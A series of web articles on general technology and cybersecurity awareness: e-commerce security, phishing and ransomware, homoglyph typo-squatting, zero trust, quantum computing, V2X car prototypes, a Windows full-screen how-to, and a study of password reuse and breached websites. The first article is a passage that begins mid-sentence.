e-commerce businesses. Cloud-based security solutions are scalable, flexible, and easy to deploy. They can also be accessed from anywhere, making them ideal for businesses with remote workers or distributed teams. Cloud-based security solutions can also offer better protection against distributed denial-of-service (DDoS) attacks. DDoS attacks can overwhelm a website or application with traffic, making it inaccessible to users. Cloud-based security solutions can help mitigate these attacks by distributing traffic across multiple servers and filtering out malicious traffic. 4. Zero Trust Architecture Zero trust architecture is a security model that assumes all users, devices, and applications are potential threats. This approach requires continuous verification of identity and access privileges, regardless of whether the user is inside or outside the network. This approach is particularly relevant for e-commerce businesses, as they deal with sensitive customer data and financial transactions. A zero trust architecture can help prevent data breaches and ensure that only authorized users have access to sensitive data. 5. Multi-Factor Authentication Multi-factor authentication (MFA) is a security method that requires users to provide multiple forms of authentication before accessing a system. This can include something the user knows, such as a password, something they have, such as a security token or smart card, or something they are, such as biometric data. MFA can provide an additional layer of security for e-commerce businesses. It can help prevent unauthorized access to customer data and financial transactions. MFA can also help protect against phishing attacks, as attackers are less likely to have access to all the required authentication factors. Cybersecurity threats are an ever-present danger for e-commerce businesses. The next generation of cybersecurity solutions, including AI/ML, blockchain technology, cloud-based security, zero trust architecture, and multi-factor authentication, offer enhanced protection and peace of mind.
<urn:uuid:54908dbe-76a3-45c1-8f9a-c04ad0ca3fb6>
CC-MAIN-2024-38
https://www.infoguardsecurity.com/what-are-the-next-generation-cybersecurity-solutions-for-e-commerce-businesses/
2024-09-08T00:59:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650926.21/warc/CC-MAIN-20240907225010-20240908015010-00007.warc.gz
en
0.930189
778
2.65625
3
Modern technology allowed more creativity in business than ever before. However, information security threats came along. Like a fire, technology brought unmeasurable benefits. But if it’s left unattended, it could bring disastrous results. It does not matter to cybercriminals if a business is big or small. They attack everyone as long as they possess data. Moreover, cybercriminals develop new ways to steal or damage data. Hence, their methods evolve and become more complex. This presents a challenge to all enterprises in protecting their data and networks. Yet, everyone must understand first the information security threats they are up against so they can battle those threats. In this article, let’s find out some of those threats. This is one of the traditional and most common methods hackers use. Phishing involves luring the victim into giving up confidential information. This sensitive information includes SSN, financial details, and demographics. In most cases, hackers do this by sending out fake emails. These appear to be real and came from legitimate sources such as financial institutions and friends. Those fake emails encourage victims to click on links attached to the email. Afterward, the website where the link takes them prompts victims to give personal information. Moreover, some of these websites ask users to install malware on their devices. To prevent this, businesses must train their employees not to download attachments. Furthermore, users must not click on links in emails from unknown senders. Additionally, avoid downloading free software from untrusted websites. Insider threats are not uncommon. This problem occurs when an authorized person intentionally or unintentionally mishandle data. Thus, this puts the organization’s data or systems at risk. Careless employees who don’t comply with the organization’s rules and policies mainly cause this problem. Moreover, third-party vendors and business partners may also cause an insider threat. Training employees and contractors on security awareness is a great way to prevent data breaches. Furthermore, give employees access to the information only essential for their tasks. Set-up temporary accounts for freelancers and contractors. Having two-factor authentication greatly lowers the risk. Drive-by download attacks This type of attack only requires the user to browse a website. The user does not have to click on anything. Just accessing a website activates the download of a malicious code. Hackers use this method to put viruses and stealing sensitive info. To prevent this, regularly update and patch your systems. Moreover, you should always have the latest versions of software and operating systems. Warn your users to stay away from insecure websites. Additionally, install security software that scans websites. Hackers use this method to lock a computer. Afterward, they demand a ransom from the victim before releasing the data. Malicious email attachments and compromised websites spread ransomware. Infected apps and external storage devices also spread ransomware. Regularly back up your computing devices. Moreover, install reputable antivirus software and regularly update it. Avoid clicking on links and opening email attachments from unknown sources. Businesses must do everything on their ability to avoid paying the ransom.
<urn:uuid:30c5b3f9-c36b-4f6c-9762-b886898e4ec9>
CC-MAIN-2024-38
https://www.ciso-portal.com/be-aware-against-these-information-security-threats/
2024-09-10T06:58:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651224.59/warc/CC-MAIN-20240910061537-20240910091537-00707.warc.gz
en
0.926418
631
2.609375
3
How to create a safer city for drivers and pedestrians by sensing movements and avoiding accidents? That seems to be researchers’ main concern when they showcase a new automotive technology – and that seems to be the case with Suzuki’s and IIT Hyderabad’s announcement last week in India. The Japanese car manufacturer and the Indian institute have teamed up to investigate how futuristic Vehicle-to-Everything – or V2X – communication technology would work in the country. V2X would enable vehicles to share real-time information about location, for example, and help reduce traffic incidents or road congestion. The companies have developed prototype vehicles showcasing five use cases that could be adopted down the road: - Ambulance alerting system: The sensing system alerts car drivers about an approaching emergency vehicle and its path through V2X communication. It helps the driver to safely plan maneuvers and make way for an emergency vehicle. The alert system will also share minute details like the distance between the vehicles on a real-time basis. - Wrong-way driver alerting system: Car drivers get a pre-alert about the existence of a driver approaching on the wrong side of the road using V2X communication. - Pedestrian alerting system: Using V2X communication, this system alerts car drivers about pedestrians nearby who could be coming in the way of the car. This will help the drivers to take precautionary measures to avoid a potential collision. - Motorcycle alerting system: Car drivers learn through V2X communication about a fast-moving 2-wheeler approaching from a blind spot and likely to collide. Real-time information is shared with the driver about the distance and direction of the approach. - Road condition alerting system: The driver receives an alert of bad road conditions and cautions the driver to tread carefully ahead in the journey. - Car as a computer: Enables all interested car users to share the idle computing capacity of the microprocessor in the car when it is not being used for driving The prototypes were presented at the IIT Hyderabad campus. Representatives from the Telecom Regulatory Authority of India and the Indian government also attended the event.
<urn:uuid:9163cb14-e860-4da6-a8ad-f650214660e8>
CC-MAIN-2024-38
https://www.6gworld.com/exclusives/suzuki-and-iit-hyderabad-showcase-v2x-prototypes-in-india/
2024-09-14T00:44:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00407.warc.gz
en
0.946793
441
3.109375
3
Cautious Internet users are familiar with the widespread recommendations: Pay attention to encrypted data transfer, do not click on unauthorized links and only surf only to known, trustworthy addresses. Unfortunately, potential attackers are also aware of these tips and try to find the weak points of the recommendations. Sometimes these can be found in the smallest details, for example, when users rely on valid encryption but do not have enough control over which page you are on. An A for an O: similar or identical looking characters Homoglyphs are different signs, which can easily be mistaken for each other because of their appearance. In the simplest case, these are for example the letter O and the digit 0 or the capital I and the small l. Very popular is also the exchange of the “g” with q, because especially our brain tries to correct this visual error “automatically” in case of longer names. Multi-letter homoglyphs are also popular, e.g. “rn” instead of “m”. In more complex scenarios homoglyphs can also be created using different alphabets and special characters. These alternative combinations are particularly difficult to see on small screens and in everyday stress, pressure and hectic situations. The actually false names are easily mistaken for the well-known original when viewed superficially. Homoglyphs in phishing and other scams Attackers like to combine different tricks and techniques. Emails or even chat messages from frequently used trusted services are faked and links with prepared domain names and URLs are provided. An important message is announced to the user, a voucher is promised or an error in an online order or invoice is faked. The more realistic the scenario, the faster the stress level rises – and the exact checking of the message may be forgotten. Invitations to video meetings are also very popular at the moment and have been appropriately prepared. When clicking on the deceptively real-looking address, the wrong website is accessed – naturally with a “correct” certificate in the background, so that the browser displays a correctly encrypted connection. This combined type of fraud is also known as “typo-squatting”. Continuous optimisation makes recognition more difficult Since no fake pages have to be built and maintained anymore, these attacks can now be generated automatically for many different services and pages. Thus it could be observed with different groups and attacks. IKARUS already warned of attacks with homoglyphs in connection with Emotet. What precautions should be taken? As always, users should be especially careful when emails or other messages with too good news, gifts, or possibly strange information about invoices or orders are received. Examine possible irregularities skeptically: Where does the contact get my work address, for example, if I always place my online orders using my private address? In addition to raising the awareness of employees, URL filtering with appropriate security software helps. The safest way is not to click on links at all, but to enter the desired URLs manually into the web browser.
<urn:uuid:d1fc8a8b-8e0f-426c-873d-b5b5e5ae5d64>
CC-MAIN-2024-38
https://www.ikarussecurity.com/en/security-news-en/what-does-homoglyph-attack-and-typo-squatting-mean/
2024-09-14T00:10:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00407.warc.gz
en
0.933267
634
2.640625
3
Full screen mode is an effective way to view an app like a web browser, word processor, or video game without distractions and in more detail. It typically allows you to use your computer screen’s entire real estate by displaying the content at full resolution and hiding toolbars. While leaving the mode is usually straightforward, it helps to know the various ways you can exit, in case the app is stuck, or you entered full screen mode by accident. So, let’s learn how to exit full screen on Windows operating systems. How do I get out of full screen on Windows? Here are six different ways to exit full screen: Your keyboard’s function keys, also known as F keys, serve as shortcuts for taking screenshots, printing, refreshing, and more. They are usually in a straight line across the top of your keyboard, typically between the Esc (Escape) key on the left and the Pause/Break key on the right. The most common way to get out of full screen mode on Windows 10 is to use the 11th function key. To leave full screen mode on Windows 10, press F11 located near the top-right of your keyboard. You can press F11 again to return. If you hit F11 rapidly, you will see the screen bounce between the two modes. Remember, some fancier keyboards on laptops or keyboards designed for gamers can have multiple functions for a single F key. If F11 doesn’t work, try using the Fn key to switch its mode. Alternatively, you may need to hold Fn before pressing F11 to exit full screen. Click the X in the circle If F11 doesn’t help, don’t panic. Try moving your mouse cursor to the top of the screen. You should now see a circle with an X. Click the circle to exit full screen mode in Windows. The Esc key, also known as the Escape key, helps you exit a mode or stop a sequence. You can find the Esc key on the top-left-corner of your keyboard. In some apps like media players or computer games, the Esc key also allows you to exit full screen mode. However, it won’t work this way in web browsers like Google Chrome, Mozilla Firefox, or Microsoft Edge. Use the square button Although the full screen modes on most apps hide toolbars, some don’t. If you see the square button before the X on the top-right on a toolbar, click it to return to regular mode. You can also press X to close the window. Use the application menu The application menu may help you leave full screen mode. Press the Alt key and the spacebar to see a list of commands. Use the restore option to exit full screen mode. Alternatively, press close to exit the app. Try the Task Manager If nothing else works, you can use the Task Manager. Press Ctrl+Alt+Del on your keyboard and click Task Manager. Now, find the app that’s stuck in full screen mode under Processes. Highlight the app and press End task at the bottom right. Here are a few more shortcuts to help you exit a program: - The Alt+F4 keyboard shortcut will completely close a program. - Windows+Tab will open the Task View Interface. - Alt+Tab will help you flip between tasks. - Windows+M can minimize all your Windows. How do I exit full screen mode on YouTube in Windows? Press the F key to exit full screen mode on YouTube. You can press it again to return to the full screen setting quickly. Alternatively, press the F11 or Esc key to switch YouTube from full screen. Full screen bugs Sometimes, malware and other Potentially Unwanted Programs (PUPs) can freeze or crash your computer, making it look like your system is stuck in full screen mode. Run a Windows antivirus solution to remove malicious software from your system that may cause such problems. To aggressively target PUPs that can cause your browser to malfunction, you can use a PUP cleaning tool. It is helpful to also learn how to check for Windows updates to optimize your operating system.
<urn:uuid:25984d82-c383-41ae-a756-765a500744e2>
CC-MAIN-2024-38
https://www.malwarebytes.com/cybersecurity/windows/how-to-exit-full-screen-on-windows
2024-09-14T00:55:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00407.warc.gz
en
0.900928
866
2.8125
3
You also learned in the spanning tree lesson how spanning tree creates a loop-free topology by blocking some of the redundant links. The “thing” with spanning tree is that we have a loop-free topology, we have redundancy but we can’t use all the redundant links for forwarding. Here’s an illustration to visualize this: The dashed lines are layer 2 links. Spanning tree will block two of these links to create a loop-free topology. Another issue with this topology is that we do have redundancy in the distribution (and core) layer but we don’t have redundancy in the access layer. When one of the distribution layer switches fails, the other one can take over. We don’t have this luxury in the access layer…when either of the switches fails then the other one can’t take over. One way of solving this problem is to create a logical switch. Cisco switches offer some technologies to convert two or more physical switches into a single logical switch, it will look like this: A1 and A2 are two physical switches but they are combined into a single logical switch. The distribution layer switches think that they are connected to one access layer switch. The uplink pairs to each distribution layer switch can be combined into an Etherchannel. When the link between D1 and D2 is a layer 2 link, spanning tree will still have to block one of the etherchannels. We can improve this topology by doing the same thing in the distribution layer, combining the two physical distribution layer switches into a single logical switch: The two distribution layer switches are now combined into a single logical switch. The four links between the switch pairs can be combined into a single etherchannel. Since we now have a single link between the two logical switches, spanning tree doesn’t have to block anything. Normally we can’t create an etherchannel that spans multiple physical switches. By creating logical switches, this is no problem. An etherchannel like this between multiple physical switches is also called Multi-Chassis Etherchannel. Combining multiple physical switches into logical switches makes our network topology a LOT simpler, here’s a “before and after” example:
<urn:uuid:bded0944-38ef-4bba-99b6-c0718bf2610c>
CC-MAIN-2024-38
https://networklessons.com/cisco/ccnp-encor-350-401/cisco-switch-virtualization
2024-09-17T19:37:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651829.57/warc/CC-MAIN-20240917172631-20240917202631-00107.warc.gz
en
0.902119
462
3.6875
4
Interest in AI is at an all-time high, and the intelligence requires substantial network space to process at the necessary speeds. But as Richard Brandon, VP Strategy at RtBrick explains, to reach its full potential as a tool in industries such as healthcare or disaster recovery, AI needs to be able to adapt in real-time to different situations. How might networks be hampering the progress of AI? Consider how we already rely on AI’s ability to manage and analyse immense amounts of data. In business, AI’s incredible processing and automation powers will become an essential tool that frees us from tedious tasks and lets us be more creative, more social. But, as a technology, AI is still young. As it matures, it will demand more and more computing power. We seem to take for granted that our traditional network infrastructure will also be perfectly able to handle all this pressure. Well, it won’t - unless it evolves too. What sort of network infrastructure do we need? Before we get to that, let’s look at how the human brain handles intelligence. We sometimes tend to think AI is smarter than us, but it’s easy to forget that our brains can process an equally impressive network of cognitive, emotional, and dynamic information. Interestingly, our brain is also limited by the size of our neural networks. A second, equally important aspect of our intelligence is our ability to receive and process new information from our surroundings. Our brains are constantly bombarded with massive amounts of complex sensory information, or Input and Output (I/O) capacity, if you want to imagine it in computing terms. The thing is, AI is still relatively young as a technology, and so, as it matures, it’ll want to scale in both of these dimensions. Is a stronger network needed to support it as it scales? Exactly. Especially when we consider time-sensitive applications. Right now, a significant portion of AI use-cases are centred around learning processes such as the assimilation of language, correlation of medical symptoms and causes, or financial pattern observations. These tasks are heavy users of ‘processing and storage’ and are rarely time-sensitive. They are unlikely to stress the input/output capacity, even if the compute and storage resources in the data centre or AI-cloud still need to connect if you want to scale. However, everything changes when AI needs to adapt to real-time situations. And if we want AI to reach its full potential, especially in cases such as disaster recovery and emergency healthcare, it needs that adaptability. Using a real-world example, AI has the potential to process and compare virology reports and patient symptoms from anywhere in the world, meaning it could identify and track potential pandemics before they spiral out of control. Or it can analyse seismic activity, using the data to predict earthquakes. Or cybersecurity activity, to map vulnerability and predict attacks. The list goes on. Why can’t our networks support this now? These scenarios require more network capacity than we currently possess, meaning we’ll need to upgrade to keep pace with the core computing power of AI’s near-future brain. And we’re not talking about the network capacity of data centres or from one data centre to another, but the capacity going out to individuals and devices on the network’s edge. In other words, mobile and broadband networks. These networks are far from ready for AI’s growth, and the only way to solve that will be to either upgrade the networks or shackle AI’s development. So, while experts are warning against the dangers of AI or promoting its positives, it’s a bit of a moot discussion until we do something about our network capacity. Unless we do something soon, we’ll have a super-advanced AI that will run far below its potential. Other magazines that may be of interest - Data Centre Magazine. Please also check out our upcoming event - Cloud and 5G LIVE on October 11 and 12 2023. BizClik is a global provider of B2B digital media platforms that cover Executive Communities for CEOs, CFOs, CMOs, Sustainability leaders, Procurement & Supply Chain leaders, Technology & AI leaders, Cyber leaders, FinTech & InsurTech leaders as well as covering industries such as Manufacturing, Mining, Energy, EV, Construction, Healthcare and Food. BizClik – based in London, Dubai, and New York – offers services such as content creation, advertising & sponsorship solutions, webinars & events.
<urn:uuid:b00dd2ad-ddb3-4643-9835-c9946ef8b402>
CC-MAIN-2024-38
https://mobile-magazine.com/articles/rtbrick-vp-will-todays-networks-hamper-tomorrows-ai
2024-09-08T02:15:01Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650958.30/warc/CC-MAIN-20240908020844-20240908050844-00107.warc.gz
en
0.945221
954
2.71875
3
The most famous line ever written about quantum theory is "If you think you understand quantum mechanics, then you don’t understand quantum mechanics". [It's a saying with a level of uncertainty appropriate to the subject. It is usually attributed to Richard Feynman, but there is no record of him saying these words. - Editor] As the era of quantum computing approaches, and in defiance of the warnings, we thought it might be useful to explain the quantum computing approach, the challenges that remain and how they are being overcome. Quantum computing approach Where classical computing uses a series of logic gates that are either open or closed to build a binary computational framework, the quantum computer uses the fact that a particle can be in different states at the same time. While this sounds hopelessly unlikely (and was lampooned by the father of quantum physics Schrödinger in his declaration that under quantum rules his cat could be alive and dead at the same time), it is the underlying truth of all physics at an atomic scale. Quantum physics opens up an entirely new way of approaching computing that could prove to be millions of times faster than classical computing. This could solve problems such as how proteins interact at a molecular level, or how we could catalysze the electrolysis of water to make a world powered by hydrogen and eliminate greenhouse gases. For many scientists the prospect of quantum is compared to the ability to see the molecular world in full resolution with sharp focus, rather than the fuzzy interpretation they have today. So how does a quantum computer work? The best explanation, as set out by Scientific American, is to consider a mouse that is trying to find its way through a maze. While a classical mouse would consider each possible route until it finds its way through, the quantum mouse is able to consider every single route simultaneously. This multi-route simultaneous approach is possible because of the special characteristics of quantum mechanics. Where in classical computing the bits are either 1 or 0, in quantum computing the bits, now called qQubits, can be in a “superposition” where they could be either 1 or 0 or any value in between – in other words, a bit like the famous cat they be in more than one state at the same time. This enables a quantum computer to be set up to contain all the possible routes simultaneously and solve the maze problem far faster. By collapsing the state of superposition in the qubits you reveal which route has the highest probability of being correct. The importance of entanglement How is it possible to set up the computational calculation in the first place? The hardware of quantum computers is based on a variety of exotic sounding technologies such as “trapped ion”, “superconducting” and “quantum dot”, but all of them use the second quantum characteristic of “entanglement” to set up the qubits for the calculation. If superposition is a tricky proposition to understand, then entanglement is beyond belief; the physical properties of a particle such as position, momentum and spin, become entangled between different particles so that no matter where they are in the universe, their properties are completely correlated. So a pair of electrons with opposing spins may be entangled while at either end of the universe - and to make matters more bizarre, any attempt to measure their spin or other physical properties will collapse the quantum superposition and lead to what is called “decoherence”. Out of this highly confusing quantum reality comes a major opportunity. While individual qubits exist in a superposition of two states, the number of states increases exponentially as you entangle more qubits with each other. So while a two-qubit system stores 4 possible values, a 20-qubit system delivers more than a million. Having set up your qubits in states of superposition and entanglement you can then consider every conceivable route through the calculation maze simultaneously, and as you collapse the state of superposition through measurement, it reveals the likeliest route through the maze. This exponential growth in processing power gives rise to a computational base that can solve some extremely complex problems such as new protein interactions or finding catalysts for the efficient electrolysis of water. But there is still a major problem to be overcome; the nature of qubits is that they operate at a quantum scale and so inevitably interact with other forces in nature causing decoherence, which interrupts the operation of the quantum computer. Noise and inevitability of errors The unwanted interaction between qubits and external forces is the biggest single challenge to the commercial application of quantum computing and is largely the focus of developers in the field today. These external forces are in reality just the noise that naturally occurs through particles emitting or absorbing energy, but they represent a sizeable challenge at the quantum scale. Some developers have taken a hardware approach, using supercooling to near absolute zero or vacuum isolation, others have tried to use a fault tolerant approach that relies on mathematical post-processing of results to try to manage the issues of errors. These approaches are limited in how they scale up with the number of qubits – and as we noted earlier it is the scale-up in qubits that leads to the massive computational advantage of quantum computing over classical. A more recent approach, and one that enables the scale up of qubits to form a highly powerful quantum computer, is to implement a life support system for the qubit. This turns the many noisy qubits into one logical qubit with centralized command and control. This enables real-time calibration of the qubits with the entire quantum computer system decoded, or essentially reset to eliminate errors, every 400 nanoseconds. Given that a nanosecond is one thousand-millionth of a second, this means that the system can be reset between every operation and faster than the natural decoherence of the qubits. This recalibration is enabled by a low-latency control system which in turn is run by a kernel at the core. The result is a practical solution for errors caused by the noise that is inherent at the quantum level. As well as its operation on existing quantum computers, the new approach is also applicable across a wide spectrum of different quantum computing hardware where it is optimized to every qubit type and matched to its noise profile. Most importantly, it is the enabling step to the scale up of quantum computers and by 2023 it is expected that systems based on over 100 qubits will be possible. To date, the highpoints of quantum computing have been set by the industry giants like Google and IBM where computers have been scaled up to 50 qubits by overcoming the error correction issue through a highly proprietary approach that can only work with their specific hardware. The real-time control system holds the prospect of enabling the many other innovators in quantum computing to have a reliable means of error correction and so accelerating the entire community in its bid to deliver operational quantum computing. What this means for quantum computing By tackling quantum errors through real-time control based on quantum time periods, we now have in prospect the very real opportunity to bring quantum computing into academic and commercial applications. The value of this just cannot be overstated; our understanding of atomic and molecular interactions is hugely limited to what we can observe empirically about how catalysts or surface chemistry interactions work. Using quantum computer simulation, we have the real prospect of understanding how nature truly works by seeing it in high resolution and sharp focus. Quantum computing will in turn to major innovations in the fields of medicine and materials to the benefit of mankind. From breakthrough drug discovery, to new clean energy fuels, to the capture of carbon dioxide and the combatting of climate change, our future as a species may well hang on the computational potential of quantum computing and the ability to overcome the noise of nature.
<urn:uuid:b0fb7db9-3663-4931-8a09-70077da3c384>
CC-MAIN-2024-38
https://direct.datacenterdynamics.com/en/opinions/disentangling-quantum-computing/
2024-09-10T11:13:41Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00807.warc.gz
en
0.944651
1,596
3
3
Hubble Telescope: 25 Years Of Stunning Images Hubble Telescope: 25 Years Of Stunning Images (Click image for larger view and slideshow.) Technology giant IBM announced two major breakthroughs towards the building of a practical quantum computer, the next evolution in computing that will be required as Moore’s Law runs out of steam. Described in the April 29 issue of the journal Nature Communications, the breakthroughs include the ability to detect and measure both kinds of quantum errors simultaneously and a new kind of circuit design, which the company claims is "the only physical architecture that could successfully scale to larger dimensions." The two innovations are interrelated: The quantum bit circuit, based on a square lattice of four superconducting "qubits" -- short for quantum bits -- on a chip roughly one-quarter-inch square, enables both types of quantum errors to be detected at the same time. The IBM project, which was funded in part by the Intelligence Advanced Research Projects Activity (IARPA) Multi-Qubit Coherent Operations program, opts for a square-shaped design as opposed to a linear array, which IBM said prevents the detection of both kinds of quantum errors simultaneously. Jerry M. Chow, manager of the Experimental Quantum Computing group at IBM’s T.J. Watson Research Center, and the primary investigator on the IARPA-sponsored Multi-Qubit Coherent Operations project, told InformationWeek that one area they are excited about is the potential for quantum computers to simulate systems in nature. "In physics and chemistry, quantum computing will allow us to design new materials and drug compounds without the expensive trial-and-error experiments in the lab, dramatically speeding up the rate and pace of innovation," Chow said. "For instance, the effectiveness of drugs is governed by the precise nature of the chemical bonds in the molecules constituting the drug." He noted the computational chemistry required for many of these problems is out of the reach of classical computers, and this is one example of where quantum computers may be capable of solving such problems leading to better drug design. The qubits, IBM said, could be designed and manufactured using standard silicon fabrication techniques, once a handful of superconducting qubits can be manufactured quickly and reliably, and boast low error-rates. "Quantum information is very fragile, requiring the quantum elements to be cooled to near absolute zero temperature and shielded from its environment to minimize errors," Chow explained. "A quantum bit, the component that carries information in a quantum system, can be susceptible to two types of errors -- bit-flip and phase-flip. It either error occurs, the information is destroyed and it cannot carry out the operation." He said it is important to detect and measure both types of errors in order to know what errors are present and how to address them, noting no one has been able to do this before in a scalable architecture. "We are at the stage of figuring out the building blocks of quantum computers -- a new paradigm of computing completely different than how computers are built today," Wong said. "In the arc of quantum computing progress, we are at the moment of time similar to when scientists were building the first transistor. If built, quantum computers have the potential to unlock new applications for scientific discovery and data analysis and will be more powerful than any supercomputer today." Interop Las Vegas, taking place April 27-May 1 at Mandalay Bay Resort, is the leading independent technology conference and expo series dedicated to providing technology professionals the unbiased information they need to thrive as new technologies transform the enterprise. IT Pros come to Interop to see the future of technology, the outlook for IT, and the possibilities of what it means to be in IT. About the Author You May Also Like Maximizing cloud potential: Building and operating an effective Cloud Center of Excellence (CCoE) September 10, 2024Radical Automation of ITSM September 19, 2024Unleash the power of the browser to secure any device in minutes September 24, 2024
<urn:uuid:9a64c14c-f783-4196-891d-0d4b3bad19fe>
CC-MAIN-2024-38
https://www.informationweek.com/it-infrastructure/ibm-sets-quantum-computing-milestone
2024-09-10T10:20:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651241.17/warc/CC-MAIN-20240910093422-20240910123422-00807.warc.gz
en
0.937311
829
3.359375
3
What Is Zero-Trust Cybersecurity? In February, the National Institute of Standards and Technology released a second draft special publication for public comment on zero trust. “A single enterprise may operate several internal networks, remote offices with their own local infrastructure, remote and/or mobile individuals, and cloud services,” the NIST publication says. “This complexity has outstripped traditional methods of perimeter-based network security as there is no single, easily identified perimeter for the enterprise. Perimeter-based network security has also been shown to be insufficient since once attackers breach the perimeter, further lateral movement is unhindered.” The special publication is designed to give federal IT leaders a “conceptual framework” using vendor-neutral terms, Scott Rose, a computer scientist at NIST, said in January at Duo Security’s Zero Trust Security Summit, presented by FedScoop. “It’s where the emphasis of zero-trust implementations lie — whether identity or the actual micro-segmentation or the underlying network itself,” Rose told FedScoop after his panel. “Every good solution has elements of all three, it’s just: What is the key turning point for the organization?” As NIST notes, zero trust refers to an “evolving set of network security paradigms that narrows defenses from wide network perimeters to individual resources.” A zero-trust architecture uses zero-trust principles to plan enterprise infrastructure and workflows, according to NIST. “Zero trust assumes there is no implicit trust granted to assets or user accounts based solely on their physical or network location (i.e., local area networks versus the internet),” NIST says. “Authentication and authorization (both user and device) are discrete functions performed before a session to an enterprise resource is established.” The NIST publication gives general deployment models and use cases where zero trust could improve an enterprise’s overall cybersecurity posture. How Agencies Are Shifting to Zero Trust According to the survey, 50 percent of government respondents said their agencies have strategies to meet the Office of Management and Budget’s Federal Identity and Access Management (FICAM) policy requirements. The further along agencies are to realizing a FICAM strategy, “the more advanced they are in consolidating identity and access controls to agency resources,” according to the survey. However, between 41 and 48 percent of respondents are still in the early stages of taking inventory of the people and/or devices accessing their organizations’ networks. The survey found that federal IT leaders are moving toward a passwordless user experience, with a little more than half planning to do so within the next two years. Respondents ranked multifactor one-time passwords (33 percent), randomly chosen passwords/PINs (22 percent) and out-of-band authenticators (20 percent) as the top three types of MFA their agencies will increase investment in over the next two years. If agencies want to move to a zero-trust environment, they will need to adopt a combination of capabilities, the survey notes. Those include the ability to determine which systems and devices are owned or managed by the enterprise and which are not; making all communication to agency resources secure regardless of whether it’s from inside or outside the network perimeter; and ensuring access to individual enterprise resources is granted on a per-connection basis. Nearly half or more of respondents said their agencies had minimal to average capabilities in determining which devices are owned by the enterprise and which are not and whether communications and individual connections are secure.
<urn:uuid:cca8c575-d349-490b-b1da-46a6fe249b01>
CC-MAIN-2024-38
https://fedtechmagazine.com/article/2020/03/vpn-still-valuable-zero-trust-environment
2024-09-11T16:24:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651390.33/warc/CC-MAIN-20240911152031-20240911182031-00707.warc.gz
en
0.939163
749
2.671875
3
Data breaches are a huge and growing cybersecurity issue which affects pretty much everyone who lives in modern society. Just recently I wrote about a 41GB dump file database with 1.4 billion credentials acquired from 252 data breach incidents. The impact of data breaches and how they affect web security are staggering. We’re basically all compromised. I have a confession to make: I use passwords for my various online services which are very difficult to crack, but I do reuse some passwords for multiple accounts. It’s my worst security habit. It’s also a habit that millions of people engage in because it can be overwhelming to have to remember a unique password for each and every online service we have. I alone have accounts with Google, Twitter, LinkedIn, Netflix, Funimation, PlayStation, Peerlyst, Steam, and Medium. And there are definitely many other accounts that I have which I can’t remember off the top of my head right now. I’m completely typical that way. You may have at least as many online accounts as I do, each with a username and password. The problem is if one of my account passwords is leaked in a data breach, an attacker can try the same password with some of my other accounts and they’ll have access to those too. Cyber attackers know that a lot of us reuse passwords. Joe DeBlasio, Stefan Savage, Geoffrey M. Voelker and Alex C. Snoeren from the University of California San Diego have an exciting research project named Tripwire, not to be confused with the cybersecurity solutions company that’s based in Portland, Oregon. The researchers wrote the following in their report: “While there are a range of vectors by which account credentials can be compromised—including phishing, brute force and malware— perhaps the most pernicious arises from the confluence of data breaches and account reuse… In one recent study, Das et al. estimated that over 40% of users reuse passwords and our own anecdotal experience with stolen bulk account data suggests that up to 20% of stolen credentials may share a password with their primary email account.” DeBlasio created a bot which registered online accounts with 2,300 different web services and websites. Each account is associated with a unique email address, and the passwords used for each account are the same passwords that are used to authenticate with the email accounts. Basically, DeBlasio’s bot replicates what many of us human beings do. The researchers then watched to see if any unauthorized parties used the passwords to break into the associated email accounts. In order to make sure that the email accounts were being breached due to one of the 2,300 web services and not through vulnerabilities directly related to the email services, the researchers created a control group. About 100,000 email accounts were created with the same email provider that was used in the Tripwire project, and those email accounts weren’t used by the bots to register for online services. On to the Findings... Nineteen of the websites used in the study were compromised. One of those websites is very popular, and based in the United States with over 45 million users. The breached websites and companies have not been publicly named by the researchers. I can understand - doing so may be legally risky. “The reality is that these companies didn’t volunteer to be part of this study. By doing this, we’ve opened them up to huge financial and legal exposure. So we decided to put the onus on them to disclose,” said Alex C. Snoeren. When the researchers discovered the account breaches, they contacted the companies about them. “I was heartened that the big sites we interacted with took us seriously,” said Snoeren, but the companies didn’t inform their customers about them. “I was somewhat surprised no one acted on our results.” The researchers found that the breached email accounts were only rarely used for spam. The attackers generally just monitored the inboxes, possibly looking for useful information such as sensitive financial data. Simple Passwords vs. Complex Passwords The researchers also wanted to see the relationship between password complexity and account breaches. They created two accounts per website, one with a simple password, and one with a more complex password. The simple passwords consisted of seven-character words with their first letter capitalized and followed by a single digit. The complex passwords were random ten character strings of numbers and letters, both in lower and upper case, without special characters. If both the accounts with simple and complex passwords on a website were compromised, that may indicate that the site stores passwords in plaintext. If only the simple password account was breached, then it may indicate that the site likely stores passwords with hashes, a cryptographic technique for enhanced security. “In eight cases (categories of online services), our system registered for both an ‘easy’ and a ‘hard’ account at a site, but logins only occurred on the ‘easy’ accounts. This behavior suggests that these sites hash passwords sufficiently to at least delay the compromise of accounts with stronger passwords, or are leaking account credentials due to large-scale brute-forcing,” DeBlasio et al. wrote in their paper. “Despite well-known security practices, we observed logins using ‘hard’ passwords on ten sites. These sites appear to have stored account passwords in the clear or used easily-reversed hashes. Our methodology only registered for accounts with easy passwords after it estimated that a hard registration succeeded. This biases our results to under-report compromises, as ‘easy’ passwords are more frequently compromised. Subsequent invocations of a Tripwire system should avoid this pitfall.” Tips for Users The researchers advise users to use password managers, use unique passwords for each account, and to be careful about what sort of information we disclose online. “Websites ask for a lot of information. Why do they need to know your mother’s real maiden name and the name of your dog?” Snoeren said.
<urn:uuid:445ea062-8f2e-443a-b132-3efc6be032eb>
CC-MAIN-2024-38
https://blogs.blackberry.com/en/2018/03/research-project-tracks-websites-affected-by-data-breaches
